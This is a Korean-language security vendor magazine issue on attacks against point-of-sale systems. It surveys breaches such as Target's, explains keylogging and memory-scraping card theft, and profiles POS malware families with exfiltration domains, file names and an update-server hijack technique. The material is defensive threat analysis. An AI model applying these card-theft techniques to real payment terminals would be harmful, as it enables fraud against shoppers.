Issue. 01

Size: px
Start display at page:

Download "Issue. 01"

Transcription

1 해커의 시선, POS 시스템으로 향한다 Issue. 01

2 Issue. 01

3 해커의 시선, POS 시스템으로 향한다 CONTENTS Threat Review POS 시스템의 보안 문제 및 실제 침해 사례 4 국내외 주요 POS 시스템 해킹 악성코드 10 미국 대형 할인점 개인정보 유출 악성코드 분석 16 한동안 뜸했던 POS 위협, 빈틈 을 파고들다 23 Special Report POS 시스템 보안 위협과 AhnLab EPS 해커의 시선, POS 시스템으로 향한다 26 Case Study 유통기업 A 그룹 AhnLab EPS 도입 사례 보안성 과 안정적인 운영 모두 잡았다! 32

4 POS 시스템의 보안 문제 및 실제 침해 사례 THREAT REVIEW POS(Point of Sales, 판매시점관리) 시스템, 이른바 포스 의 보안 문제가 언론을 통해 자주 언급되고 있다. 사실 보안 전문가들은 이미 오래 전부터 POS 시스템의 보안 위험성을 경고해왔다. 그러나 보안 이라는 것이 늘 그렇듯, 최근 국내외에서 대규모 POS 시스템 해킹 사건이 잇따라 발생하면서 비로소 POS 시스템 보안이 주목받기 시작했다. 한편 윈도(Windows) XP 지원이 종료된 가운데 여전히 국내 대다수의 POS 시스템이 해당 OS를 사용하고 있어 POS 시스템 보안이 사회적인 문제로 발전될 우려를 낳고 있다. POS(Point of Sales) 시스템은 판매와 관련된 데이터를 일괄적으로 관리하고 고객정보를 수집하여 부가가치를 향상시키는 시스 템 으로 정의된다. 포스 시스템, POS 단말기, 또는 판매시점정보관리 시스템 등으로 불린다. 대부분의 POS 시스템은 256 MB ~ 1 GB 정도의 메모리에 불과한 저사양 장비에서 운영된다. 또한 상당수의 국내 POS 시스템에 는 윈도 운영체제, 그 중에서도 윈도 XP가 설치되어 있다. 최근 상위 버전의 OS로 교체되고 있지만 여전히 윈도 XP가 가장 널리 이 용되고 있다. POS 시스템과 단말기 사양 예시 4

5 POS 시스템 보안 침해 사고 사례 최근 국내외에서 POS 시스템을 해킹해 신용카드 정보를 탈취하는 사건이 다수 발생하고 있다. 이에 각국 정부는 마그네틱에 담 겨 있는 정보를 손쉽게 탈취할 수 있는 기존 카드 대신 IC카드가 내장된 칩앤핀(Chip-and-PIN) 방식의 신용카드를 보급하고 있 다. 그러나 IC카드를 인식하는 카드 리더기의 보급이 부족한 관계로 유럽 지역을 제외한 한국과 미국에서는 대부분 기존 방식을 사 용하고 있다. 미국 정부는 PCIDSS 등의 보안 규약을 마련했지만 이것만으로는 POS 시스템을 보호하기는 어렵다고 알려져 있다. 1. 국내 사례 국내에서는 2000년대 중반부터 POS 시스템 해킹이 종종 발생했던 것으로 알려져 있다. 대부분은 범인이 확인되지 않았다. 그러나 지난 2013년 12월 커피전문점과 식당 등에 설치된 POS 단말기를 해킹해 신용카드 정보를 빼돌린 일당이 검거됐다. 언론 보도에 따르면, 범인들은 당시 전국 85곳의 가맹점 POS 단말기에 있던 20만 5,000 건의 카드 거래 정보를 빼내 위조카드를 만들어 국내 외 자동인출기(ATM)에서 1억 2,000여 만 원을 인출했다. [그림 1] 2013년 12월 발생한 POS 시스템 해킹 (*출처: 동아경제) 2. 해외 사례 HP는 자사 블로그를 통해 지난 2002년부터 2014년까지 발생한 주요 신용카드 정보 유출 사건을 전했다. 가장 유명한 사례는 2013년 말에 발생한 미국의 유명 대형 할인점인 타겟(Target)사의 신용카드 및 개인정보 유출 사건이다. 이 사 건은 미국 최대 명절인 추수감사절 시즌에 발생한 것으로, 2013년 11월 27일부터 12월 15일 사이에 오프라인 매장의 POS 시스 템을 통해 7,000만 건의 신용카드 정보가 유출됐다. 또한 2014년 5월에는 전 세계 1,500 대의 POS 시스템을 감염시킨 네만자(Nemanja) 봇넷이 발견되었다. [그림 2] 해외 신용카드 사기 사례 (*출처: HP 블로그, Credit card fraud scene ) 5

6 THREAT REVIEW POS 시스템의 구성 및 결제 과정 POS 시스템은 크게 본체, 카드 입력기, 영수증 프린터로 구성된다. 이중 카드 입력기 는 최근 IC 카드를 읽는 단말기도 있지만 대부 분 마그네틱 카드를 읽는 역할을 하기 때문에 MSR(Magnetic Stripe Reader)로도 불린다. 이와 함께 마그네틱 카드의 복제가 쉬 운점 등을 이용해 범죄자들은 비교적 보안이 허술하고 대량의 신용카드 정보를 얻을 수 있는 POS 시스템을 노리기 시작한 것이다. POS 시스템을 통한 신용카드 결제 과정은 일반적으로 아래와 같다. POS 시스템을 통한 신용카드 결제 과정 구매자가 판매처에서 신용카드로 결제하면 POS 시스템의 카드 입력기(카드 리더기)를 통해 카드 종류, 카드 번호, 유효 기간 등의 정보를 읽은 후 부가가치통신망사업자(VAN)로 전달된다. 부가가치통신망사업자는 이렇게 수집한 정보를 토대로 해당 카드사나 은 행에서 승인이 가능한 카드인지 조회한다. 카드사 전산망에서 카드 한도, 거래 정지 유무 등을 조회하여 이상이 없으면 카드를 승인 하고 승인 내용이 POS 시스템으로 전달되면 카드거래 명세서가 출력되고 구매자의 서명을 받아 결제가 완료된다. 은행과 카드사는 전용망을 사용하고 있을 뿐만 아니라 상대적으로 보안 시스템이 잘 갖추어져 있기 때문에 공격자가 이를 통해 신용 카드 정보를 탈취하기는 쉽지 않다. 반면 POS 시스템은 별다른 보안이 갖추어져 있지 않은 경우가 대부분이고 윈도를 운영체제로 사용한다는 점에서 일반 컴퓨터와 크게 다르지 않다. 이를 뚫고 들어갈 악성코드 제작도 쉽게 할 수 있다. POS 시스템 관련 위협 요소 POS 시스템과 관련된 보안 사고는 대부분 POS 시스템 통신 POS 시스템 관리 업체 등에서 발생한다. 1. POS 시스템 공격자의 입장에서 POS 시스템을 통해 신용카드 정보를 탈취할 수 있는 지점은 마그네틱 카드 리더기인 MSR, 메모리, 그리고 하드디스크 등이다. 우선 사용자가 신용카드를 사용하는 지점인 카드 입력기, 즉 카드 리더기 에서부터 정보가 유출될 수 있다. 대부분의 카드 리더기는 키보드와 동일 하다고 볼 수 있다. 카드 리더기로 신용카드를 읽으면 POS프로그램에 해 당 정보가 입력된다. 이때 메모장을 열어두면 [그림 3]과 같이 카드 번호 [그림 3] 카드 입력기가 읽어낸 마그네틱 카드 정보 와 관련 정보가 텍스트로 입력 되는 것을 볼 수 있다. 즉, 키 입력 내용을 가로챌 수 있는 키로거(keylogger)를 이용해 신용카드 정보를 탈취할 수 도 있다는 것이다. 또한 카드 리더기에서 신용카드를 읽을 때 POS 시스템 관리 프로그램이 나 메모리 등에 데이터가 저장된다. 따라서 POS 시스템의 메모리를 검색 하면 신용카드 정보를 확인할 수 있다. 6

7 한편 일부 POS 시스템에서는 카드를 읽는 순간부터 데이터를 암호 화한다. 그러나 신용카드 전표를 출력하기 위해 복호화된 데이터를 메모리상에 갖고 있기 때문에 여전히 신용카드 정보가 노출될 가능 성이 있다. 신용카드 정보에 대해 카드사의 승인을 받는 동안 해당 정보가 POS 시스템에 보관되기도 한다. 이때 신용카드 정보가 제대로 암호화되 지 않은 채 보관될 경우, 관련 파일만 알면 쉽게 신용카드 정보를 확 보할 수 있다. [그림 4] POS 시스템 메모리에서 찾은 신용카드 정보 공격자는 신용카드 정보를 탈취하기 위해 탭핑(tapping) 취약점 악성코드 등을 이용할 수 있다. 탭핑(tapping)이란 도선( 導 線 )을 통해 전송되는 정보를 물리적으로 탈취하는 방식이다. 물리적으로 시스템에 접근해야 하기 때문 에 공격자의 입장에서는 내부자와 공모해야 하는 어려움, 또는 현장에서 적발될 위험을 감수해야 한다. 상대적으로 공격자가 쉽게 정보를 탈취할 수 있는 방법은 운영체제나 POS 시스템 관리 프로그램의 취약점을 이용해 시스템을 훔쳐 보거나 장악하는 것이다. 대부분의 POS 시스템은 윈도 보안 업데이트를 적용하지 않는 경우가 허다하다. 한편 다수의 POS 시스템 관리 프로그램들은 가맹점의 POS 시스템 관리를 위한 원격제어 기능을 포함하고 있기때문에 외부에서 접속이 가능하다. 게다가 [그림 5]와 같이 대다수의 가맹점의 시스템 로그인 암호가 1234 와 같은 단순한 숫자이거나 매장 전화번호와 동일한 경우가 많아 공격자가 유추하기 쉽다. 다른 컴퓨팅 시스템과 마찬가지로 정보를 탈취하는 악성코드를 POS 시스템에 감염시켜 신용카드 정보를 유출할 수 있다. 따라서 공격자 들은 POS 시스템을 악성코드에 감염시키기 위해 다양한 방법으로 공 [그림 5] POS 시스템 로그인 암호 예시 격을 시도한다. 2. 통신 POS 시스템에서 전송되는 신용카드 정보는 대체로 암호화하지만 POS 시스템 관리 프로그램의 로그인 정보(ID 및 패스워드) 등은 암호화를 하지 않는 경우도 있다. 로그인 정보는 신용카드 정보 유출과 직접 연관은 없다. 그러나 POS 운영프로그램을 웹에서 서비 스 하는 경우도 있어, 로그인 정보만 알고 있다면 외부에서 접속 가능해 정보 유출의 위험이 존재한다. [그림 6] 평문으로 전송되는 POS 시스템 로그인 정보 7

8 THREAT REVIEW 3. POS 시스템 관리 업체 POS 시스템 관리 업체는 POS 시스템, 즉 단말기를 대여 또는 판매하는 업체다. 소규모 매장을 관리하는 업체 중에는 서버에 고객 사 매장의 메뉴, 광고 내용 등을 보관하는 경우도 있다. 또한 관리 업체 서버를 통해 POS 시스템 관리 프로그램의 업데이트가 이뤄 지기도 한다. 따라서 관리 업체의 서버가 해킹돼 프로그램이 바뀌거나 변조된 경우 해당 서버와 연결된 POS 시스템은 악성코드에 쉽게 감염될 수 있다. POS 시스템과 악성코드 1. 감염 경로 POS 시스템은 기본적으로 컴퓨터와 동일하므로 다양한 경로를 통해 악성코드에 감염될 수 있다. POS 시스템의 악성코드 감염 주요 경로 대표적인 POS 시스템의 악성코드 감염 원인은 POS 시스템에서의 인터넷 이용이다. 소규모 업체의 경우에는 개인 용도로 사용 중 인 노트북 등에 카드 리더기와 용지 출력기를 연결해 카드 결제 시스템으로 이용하는 경우가 많다. 해당 컴퓨터로 웹 서핑이나 게임 등 인터넷을 이용하고 있어 악성코드 감염 가능성이 높다. 또한 최근 유행하고 있는 소셜 커머스를 이용한 고객 대응을 위해서 소 셜 커머스 업체의 홈페이지에 접속해야 하는 경우도 있다. 만일 소셜 커머스 업체가 해킹 당한 경우, 이를 통해 POS 시스템이 악성 코드에 감염될 수도 있다. 둘째, POS 시스템에 USB 메모리를 연결 시 악성코드 에 감염되는 경우다. [그림 7]과 같이 POS 시스템은 일 반 컴퓨터와 동일하게 키보드, 마우스 등을 연결할 수 있다. 실제로 매장 재고 관리 등을 위해 관리 업체에서 USB 메모리를 POS 시스템에 연결하는 경우가 많은데, 감염된 USB에 의해 POS 시스템까지 악성코드에 감염 될 수 있다. 셋째, POS 시스템 관리 프로그램의 업데이트 과정에서 [그림 7] POS 시스템의 입출력 포트 악성코드에 감염될 가능성도 있다. 대다수의 애플리케 이션과 마찬가지로 POS 시스템 관리 프로그램도 인터 넷을 통해 업데이트 되고 있다. 이때 업데이트된 파일이 악성코드를 포함하고 있을 경우 POS 시스템을 부팅하 는 것만으로도 악성코드 감염이 발생할 수 있다. 8

9 넷째, 상대적으로 드물긴 하지만 POS 시스템 장애 등의 경우 이를 복원하기 위해 관리 업체에서 제작한 하드디스크 이미지에 악 성코드가 포함되어 있는 경우도 있다. 악성코드에 감염된 하드디스크 복원 이미지로 시스템을 복구함으로써 악성코드에 감염되는 것이다. 2. 악성코드 공격 기법 악성코드를 이용한 신용카드 정보 탈취 시 사용하는 공격 기법은 키로깅(Keylogging)과 메모리 스크래 핑(Memory Scraping) 등이 있다. 카드 입력기를 통해 신용카드를 결제할 때 신용카드 정보가 POS 시스템 관리 프로그램에 입력된다. 공 격자가 이 정보를 중간에서 가로채면 신용카드 복제 에 필요한 정보를 확보할 수 있다. 주로 국내에서 발 견되는 악성코드가 키로깅 기능을 포함하고 있다. 공격자는 키로깅을 위한 악성코드를 직접 제작하는 대신 상용 키로거나 원격 제어 프로그램을 이용하기 [그림 8] 키로깅을 통한 신용카드 정보 탈취 도 한다. 미국 등 해외에서는 키로깅 방식보다 메모리 스크래 핑 방식이 주로 이용되고 있다. 국내에서는 메모리 해킹으로 알려진 메모리 스크래핑 방식은 POS 시스 템이 신용카드 번호를 메모리에 저장할 때 사용하는 특정한 규칙을 노린 방식이다. [그림 9] 메모리 스크래핑 기법을 이용하는 악성코드가 찾는 문자열 지금까지 POS 시스템과 관련된 보안 문제, 특히 악성코드를 이용한 공격 기법을 알아봤다. 주요 POS 시스템을 노린 악성코드와 국내에서 발생한 실제 POS 시스템 감염 사례에 대한 상세한 내용은 다음 장에서 살펴보겠다. <참고 사이트> 12-The/ba-p/ #.U3ceTnIvm1L 9

10 국내외 주요 POS 악성코드 THREAT REVIEW 최근 POS(Point of Sales, 판매시점관리) 시스템을 이용한 대규모 침해 사고가 국내외에서 잇따라 발생 하고 있다. 국내에서는 2013년 12월 POS 단말기 관 리 업체의 서버를 해킹해 85개 가맹점의 POS 단말기 에 저장된 신용카드 정보를 탈취, 이를 이용한 위조카 드로 1억원을 인출한 사건이 발생했다. 비슷한 시기에 미국에서도 대형 유통업체 타겟(Target)사의 오프라인 매장의 POS 시스템을 통해 7,000 만 건의 신용카드 정보가 유출되는 사고가 발생했다. 그 동안 보안 전문가들의 경고에도 불구하고 간과됐던 POS 시스템의 보안 위협이 대규모 보안 침해 사고로 현실화된 것이다. 이 글에서는 POS 시스템을 노리는 국내외 악성코드를 알아보고, 국내 POS 시스템 보안 침해 사례에 이용된 악성코드를 상세하게 살펴본다. POS 시스템과 관련된 보안 침해 사고가 증가함에 따라 정부 및 기관은 관련 규제를 강화하는 움직임을 보이고 있다. 금융감독원은 최근 POS 단말기에 소비자의 카드 정보를 저장할 수 없도록 하고 카드결제 내역은 암호화하여 결제승인대행업체로 전송하도록 하 는 등의 조치를 발표했다. 지난 2013년 말 발생한 타겟사의 POS 시스템 해킹으로 대규모 개인정보 유출 사건을 경험한 미국에서 는 주요 금융기관과 지방은행, 신용조합을 중심으로 기존 마그네틱 방식의 신용카드에 반도체칩을 추가 장착한 IC카드를 출시하는 한편, 가맹점의 POS 시스템 또한 IC카드용으로 전환을 서두르고 있다. POS 시스템을 겨냥한 악성코드가 마그네틱 카드의 데이터 를 탈취한다는 점에 주목한 것이다. 일반적으로 금융거래에 사용되는 마그네틱 카드에 저장된 데이터는 ISO/IEC(International Organization for Standardization and International Electrotechnical Commission) 7813 을 따르고 있다. 마그네틱 트랙(Magnetic tracks)은 트랙1~트랙3으로 이루어져 있으며, 현재 트랙1과 트랙2를 사용하고 있다. 그 구조는 [그림 1]과 같다. 10

11 덱스터(Dexter) 2012년 12월 대규모 감염이 확인되었다. 사이버보안 업체 시큐러 트(Seculert)는 자사 블로그를 통해 신용카드 번호를 추출하는 덱스 터(Dexter)가 전세계에 유포되었다고 주장했다. 이에 따르면 한국에 서도 해당 악성코드 감염 보고가 있었다고 한다. [그림 1] 마그네틱 트랙1과 트랙2의 구조 (*출처: 위키피디아) 신용카드 정보 유출을 목적으로 하는 악성코드는 마그네틱 리더기 로 입력되는 값을 노리거나 메모리에서 트랙1이나 트랙2로 추정되 는 내용을 검색하는 기능을 포함하고 있다. POS 시스템을 노린 악성코드 지난 2009년부터 2014년 8월까지 발견된 주요 POS 시스템을 노 린 악성코드에 대해 살펴보자. 트래커(Tracker) 2009년에 처음 발견된 악성코드로, POS 시스템을 노린 초기 악성 코드로 알려져 있다. 일반 응용 프로그램 개발 언어인 델파이(Delphi)로 제작되었으며, 메모리에서 트랙1과 트랙2에 해당하는 신용 카드 정보를 정규 표현식(Regular Expression)으로 찾아 Data.txt 등에 저장한다. [그림 3] 덱스터(Dexter)의 신용카드 번호 추출 코드 v스키머(vskimmer, 또는 Vskimm) v스키머(vskimmer) 또는 V스킴(Vskimm)이라고 불리는 악성코드 는 2013년 3월 맥아피에서 처음 공개했다. 이 악성코드가 실행되면 메모리 내에서 트랙 정보가 검색된다. 해당 악성코드는 변형이 존재하며, 수집된 카드 번호를 mx3.ringtonetrip.com 등으로 전송 한다. [그림 4] v스키머(vskimmer 또는 Vskimm) 검색 문자열 [그림 2] 신용카드 정보를 수집하여 Data.txt에 저장하는 트래커(Tracker) [그림 5] v스키머 악성코드의 접속 주소 11

12 THREAT REVIEW 발견 당시 v스키머가 접속한 주소는 xxx.xx로, 해당 IP는 주 기적으로 다른 도메인 네임을 가졌다. 해당 IP는 랜섬웨어 등 다른 악 다른 악성코드와 마찬가지로 신용카드 번호를 찾는 문자열을 확인 할 수 있으며, 관련 문자열은 악성코드 변형에 따라 다르다. 성코드의 통신에도 이용되었다. 즉, 해당 IP를 이용한 것이 동일인 혹 은 동일 그룹의 소행이라면 신용카드 번호 수집 외에도 여러 금전적 인 목적의 악의적인 행위를 하고 있었음을 추측할 수 있다. v스키머 악성코드의 특징은 감염 시스템이 인터넷에 연결되어 있지 않을 경우, 볼륨 이름이 KARTOXA007 인 이동식 드라이브를 찾아 카드 번호를 dmpz.log에 저장하는 것이다. 이는 망이 분리되어 있 는 POS 시스템에서 정보를 유출하기 위한 것으로 보인다. [그림 8] 알리나 악성코드 변형의 메모리 검색 문자열 잭포스(Jackpos) 2014년 2월 보안업체 인텔크롤러(IntelCrawler)가 악성코드 잭포 스(Jackpos)에 관한 정보를 공개했다. 국내에서도 2013년 11월 해 당 악성코드의 변형이 확인되었다. 국내에서 발견된 변형의 파일 이 름은 spread.exe였으며, 이 악성코드를 실행하면 Hacking of network started 등의 메시지가 나타난다. 잭포스 악성코드는 여러 파 일로 구성되어 있다. 이들 파일 중 일부는 Autoit으로 제작되어 있으 [그림 6] 인터넷이 연결되지 않았을 경우 탈취한 정보를 USB 메모리에 저장 며 [그림 9]와 같이 코드가 난독화되어 있다. 알리나(Alina) 2013년 5월 보안업체인 트러스트웨이브(Trustwave)가 자사 블로 그(스파이더 랩 블로그)를 통해 보고한 악성코드이다. [그림 7]과 같 이 알리나(Alina)라는 문자열과 버전 정보를 포함하고 있는 것이 특 징이다. [그림 9] Autoit으로 제작된 잭포스 악성코드의 난독화된 소스코드 해당 악성코드의 pdb 정보에 hack, POS 등의 문자열이 포함되어 있어 POS 시스템 해킹을 위해 제작되었음을 추측할 수 있다. [그림 7] 알리나(Alina) 악성코드에서 나타나는 특징적인 문자열 [그림 10] 잭포스(Jackpos) 변형의 pdb 정보 12

13 Mmon(BlackPOS, Kartoxa) Mmon은 2011년부터 발견되었으며, 7,000만 건의 신용카드 정보 가 유출된 미국 대형 유통업체인 타겟사 POS 시스템 해킹에 Mmon 변형이 이용되어 유명해졌다. Mmon이 실행되면 [그림 11]과 같이 프로세스를 검색해 신용카드 번호를 추출하고, 검색 결과는 [그림 12]와 같이 output.txt에 저장된다. [그림 14] xxx.xxx의 다양한 도메인 네임 츄바카(Chewbacca 또는 Fsyna) 악성코드 츄바카(Chewbacca 또는 Fsyna)는 2013년 12월 보안업 체 카스퍼스키(Kaspersky)에서 최초로 공개하면서 알려졌다. 영화 [그림 11] 프로세스 검색 중인 악성코드 Mmon 스타워즈 의 등장 인물인 츄바카(Chewbacca)와 관련된 문자와 이 미지가 포함되어 있어 붙은 이름이다. 츄바카 악성코드는 신용카드 정보를 유출하기 위해 키로깅과 메모 리 스크래핑 기법을 사용한다. 우선 키로깅 기법을 이용해 [그림 15] 와 같이 사용자가 입력하는 키 내용을 %temp% 폴더의 system. log에 저장한다. [그림 12] 악성코드 Mmon의 검색 결과가 저장된 output.txt Mmon 악성코드는 KAPTOXA 와 같은 문자열을 포함하고 있는 것 이 특징이다. [그림 15] %temp% 폴더에 키로깅 내용 보관 또한 [그림 16]과 같이 메모리에서 신용카드 정보를 검색한다. [그림 13] Mmon 악성코드에 포함된 문자열 KAPTOXA [그림 16] 츄바카 악성코드의 신용카드 정보 검색 문자열 또 Mmon 악성코드는 xxx.xxx로 접속한다. 해당 IP의 도 메인을 확인해보면 [그림 14]와 같이 다양한 도메인 네임을 가지고 있다. 츄바카 악성코드의 특징은 추적을 피하기 위해 Tor를 이용해 통신한 다는 점이다. 타겟사 공격에 사용된 악성코드 변형에 대한 보다 자세한 내용은 다 음 장의 미국 대형 할인점 개인정보 유출 악성코드 분석 에서 확인 할 수 있다. [그림 17] Tor를 이용한 통신 13

14 THREAT REVIEW 백오프(Backoff) 2014년 7월 말, US-CERT는 홈페이지를 통해 POS 시스템을 감염 시켜 고객의 이름, 주소, 신용카드 번호 등의 정보를 유출하는 악성 코드를 백오프(Backoff)로 명명하고, 주의를 당부했다. 해당 악성코 드는 US-CERT가 미국 내에서 발생했던 다수의 POS 시스템 침해 사고를 조사하던 중 발견된 것으로, 2013년 10월부터 2014년 6월 까지 활동했다고 US-CERT는 전했다. US-CERT의 분석 보고서에 따르면 백오프 악성코드는 버전 1.4부 터 1.56까지 확인되었다. 그러나 안랩에서 관련 변형을 확인한 결 과, US-CERT 문서에는 언급되지 않은 1.56 wed와 1.57 NEW- GRUP 버전이 존재하는 것으로 확인됐다. 백오프 악성코드는 메모 리 내에서의 트랙 데이터 수집 및 키로깅 기능을 가지고 있다. Ompos 2014년 초 국내 POS 시스템 해킹에 Ompos라는 악성코드가 이 용됐다. 이 악성코드는 2014년 1월초에 제작된 것으로 추정된다. 공격자는 국내 POS 시스템 관리 업체의 서버를 해킹하고, 악성코드 가 포함된 업데이트 파일을 이용해 POS 시스템을 감염시켰다. 이는 해외 사례에서는 찾아보기 어려운 독특한 방식으로, 이를 간략히 도 식화하면 [그림 19]와 같다. 공격자는 사전에 모 POS 시스템의 자동 업데이트 프로그램인 ***_ AutoRun.exe를 악성코드가 포함된 ***PosDemon.exe로 교체해 피해 업체의 POS 시스템이 해당 프로그램을 다운로드함으로써 감 염되는 방식이다. POS 시스템에 다운로드된 ***PosDemon.exe가 실행되면 키로깅 기능이 있는 *Pos.exe가 실행되고 ***PosDemon. exe는 정상 파일로 덮어 쓰여진다. 또한 *Pos.exe의 키로깅 기능을 통해 해당 POS 시스템에서 사용된 신용카드 정보가 *Bank****로 시작되는 로그 파일에 저장된다. 국내에서 발견된 POS 시스템 악성코드 앞서 언급한 바와 같이 국내에서도 덱스터(Dexter), 잭포스(Jackpos) 등 해외에서 제작된 악성코드 감염이 확인된 바 있다. 그러나 국내 POS 시스템을 노리고 제작된 악성코드와 해킹 시도가 존재 한다. 상용 키로거(Keylogger) 2013년 5월 국내 모 대형 유통사의 POS 시스템에서 해킹으로 의심 되는 행위가 탐지되어 확인한 결과 상용 키로거가 발견되었다. POS 시스템 해킹을 목적으로 제작된 악성코드는 아니지만 상용 키로거 프로그램을 이용한 POS 시스템 해킹 시도라는 점에서 눈여겨볼 필 요가 있다. 해당 상용 키로거가 실행되면 키로거 프로그램이 생성되고 사용자 가 입력하는 내용이 저장된다. [그림 19] Ompos 감염 방식 [그림 19]에 나타난 과정을 자세히 살펴보면, 우선 POS 시스템에 는 POS 프로그램의 업데이트 기능을 수행하는 ***_AutoRun.exe 가 존재한다. POS 시스템이 실행되면 ***_AutoRun.exe가 POS 시 스템 업체 서버와 통신하여 업데이트 파일이 존재하는지 확인한다. 그 후 ***_AutoRun.exe는 악성코드가 포함된 ***PosDemon.exe 를 매장의 POS 시스템에 다운로드 한다. 다운로드된 파일은 원본 파일의 이름과 동일하며 리소스 영역에 정상 파일을 포함하고 있다. [그림 18] 생성 파일과 키로깅 내용을 담고 있는 데이터 파일 [그림 20] 리소스 영역에 존재하는 정상 파일 14

15 ***PosDemon.exe는 파일 리소스 영역에 존재하는 원래 파일로 덮 어 쓰여져 실행되기 때문에 사용자는 악성코드 감염 여부를 확인하 기 어렵다. 또한 주요 문자열이 [그림 21]과 같이 난독화되어 있다. IMAGE 디렉터리에는 매장의 POS 시스템에서 출력되는 메뉴, 매장 홍보 내용도 볼 수 있다. 심지어 개인 정보와 관련된 파일로 저장되어 있어 보다 철저한 시스템 관리가 필요하다. [그림 24] 서버에서 찾을 수 있는 매장 내 POS 시스템의 이미지 정보 [그림 21] 난독화된 문자열 해당 악성코드에는 키로깅 기능이 있어 윈도 폴더의 *Bank****_년_ 월_일.log 파일에 입력된 키의 내용이 저장된다. POS 시스템도 예외 없어 다각도의 보안 대책 필요 편의점이나 일반 매장 등에서 사용하는 POS 시스템은 대부분 저 사양 컴퓨터에 관련 프로그램이 운용되는 형태다. 그러나 신용카드 번호 등 고객의 민감한 정보와 접촉하는 지점이자 이러한 정보가 1 차로 저장되는 지점이므로 반드시 보안에 대한 조치가 동반되어야 한다. 우선, POS 시스템의 로그인 암호를 복잡하게 설정하고 주기적으로 변경해야 한다. 또한 POS 시스템을 겨냥한 악성코드가 증가하고 있 는 만큼 지속적으로 POS 시스템이 운용되는 단말기에 보안 업데 이트를 적용하고 POS 시스템 운영에 필요하지 않은 서비스는 중 지해야한다. [그림 22] 저장된 키로깅 내용 변형에 따라 해당 악성코드는 xxx.xxx:8902나 xxx.xxx:9501 등으로 통신한다. 한편 해킹된 서버는 별다른 로그인 과정 없이도 웹 브라우저상에서 서버 파일 구성을 알 수 있다. 아울러 POS 시스템의 당초 목적 이외의 용도로는 시스템을 이용하 지 않도록 유의해야 한다. 특히 웹 서핑을 통해 악성코드에 감염될 가 능성이 높기 때문에 주의가 필요하다. 이러한 기본적인 조치 외에도 전용 보안 프로그램을 설치하는 것이 바람직하다. POS 시스템은 저사양 컴퓨터에서 운용되는 만큼 알려 진(또는 허용된) 프로그램만 실행할 수 있도록 하는 화이트리스트 (Whitelist) 기반의 제품을 도입하는 것이 상대적으로 효율적이며 안전하다. 그러나 지속적으로 새로운 POS 시스템을 노린 악성코드와 피해 사 례가 보고되고 있다. 금전적 이득을 노린 공격자들은 계속해서 새로 운 방법을 찾아내어 공격하고 있으며 POS 시스템도 결코 예외가 아 [그림 23] POS 시스템 관리 업체의 서버 구성 니라는 점을 반드시 명심해야 한다. 15

16 미국 대형 할인점 개인정보 유출 악성코드 분석 THREAT REVIEW 2013년 12월, 미국의 유명 대형 할인점인 타겟(Target)사의 고객 개인정보와 신용카드 정보가 해킹으로 유출되는 사건이 발생했다. 타겟사는 월마트에 이어 미국 내 2위의 소매업체로, 미국과 캐나다에서 1,900여개 매장을 운영하 고 있다. 당초 피해자는 4천만 명 수준으로 알려졌으나 이 업체의 공식 성명서에 따르면 발생한 오프라인 방문 고객 들의 계좌정보 유출사건으로 7천만명의 피해자가 발생했다. 타겟사의 고객 정보 유출 사고는 미국 최대 명절인 추수 감사절 시즌을 노려 발생한 것으로, 2013년 11월 27일부터 12월 15일 사이에 오프라인 매장에서 신용카드로 물 품을 구입한 사람들의 개인정보 및 신용카드 정보가 유출됐다. 이 글에서는 타겟사의 개인정보 유출 공격에 이용된 악성코드를 살펴본다. 타겟사 개인정보 유출사고 타임라인 공격에 사용된 악성코드 샘플, 크렙스온시큐리티(KrebsOnSecurity) 블로그에 공개 일부 보안 업체에서 관련 악성코드에 대한 정보 공개 그렉 스타인하펠(Gregg Steinhafel) 타겟사 CEO, CNBC 인터뷰를 통해 POS 시스템에서 악성코드가 발견되었다고 설명 미국 대형 할인점인 타겟(Target)사, 공식 성명을 통해 고객 신용카드 정보에 불법적인 접근이 있었음을 발표 16

17 [그림 1] 타겟사의 개인정보 유출 사고 관련 공식 성명 (*출처: 타겟 홈페이지, 2013) 타겟사 해킹 공격과 관련된 악성코드가 알려지면서 보안 업체인 인텔크롤러(IntelCrawler)는 러시아의 세인트 피터스버그(St. Petersburg)에 거주하는 17세 남성인 리나트 사바에브(Rinat Shabaev)를 악성코드 제작자로 지목했지만, 실제 제작자는 러시아 사 라토브(Saratov)에 거주하고 있는 23세 남성으로 밝혀졌다. 이 남성은 러시아 라이프뉴스(Life news)와의 인터뷰를 통해 관련 악 성코드의 최초 프로그램 제작에 대해서는 시인했지만 악의적인 목적으로 제작한 것이 아니며 누군가 자신의 프로그램을 변형했다 고 주장했다. 악성코드 감염 추정 경로 2014년 3월 현재 실제 공격자가 밝혀지지 않은 가운데, 관련 악성코드 분석 결과 공격자는 이미 내부 서버를 장악한 후 POS 시스 템에 악성코드를 감염시킨 것으로 추정된다. 현재까지 어떻게 내부 시스템으로 침투 했는지는 알려지지 않았다. 다만 미국 내 언론 보도를 통해 공격자가 냉난방공조(HVAC, heating, ventilation, and air conditioning) 시스템 업체를 통해 타겟사 내부 시스템에 접근했다는 주장이 제기됐다. 크렙스온시큐리티의 브라이언 크렙스(Brian Krebs)는 해당 악성코드가 HVAC 업체인 파지오 미케니 컬 서비스(Fazio Mechanical Services)를 통해 침입했다고 주장했다. 현재 파지오의 프로젝트 안내 페이지는 접속이 되지 않고 있 지만 이 업체의 예전 페이지를 확인한 결과, 타겟사가 이 업체의 고객사 리스트에 언급되어 있었다. 17

18 THREAT REVIEW 악성코드 구성 및 공격 방식 지금까지 알려진 바에 따르면 공격자는 외부에서 침입해 내부 시스템을 장악하여 악성코드를 배포하고 POS 시스템의 신용카드 정 보를 탈취하여 외부 FTP 서버로 전송했다. 공격은 다음과 같이 이뤄졌을 것으로 추정된다. 타겟사 정보 유출 공격 흐름 예상도 POS 시스템 감염 악성코드 분석 1. 악성코드 종류 POS 시스템을 감염시킨 것으로 추정되는 악성코드 2개가 발견되었다. 이들 파일들의 작성 시간은 각각 2013년 11월 28일과 11 월 29일으로, 공격 시점으로 알려진 기간과 일치한다. pdb 정보를 확인하면 z:\projects\rescator\mmonnew\debug\mmon.pdb를 확인할 수 있다. [그림 2] POS 시스템 감염 악성코드의 pdb 정보 2. 동작 방식 이들 악성코드의 기능은 크게 서비스 등록 신용카드 정보 수집 수집 정보 전송 등으로 구분된다. 악성코드는 자기 자신을 서 비스로 등록해 실행된다. 18

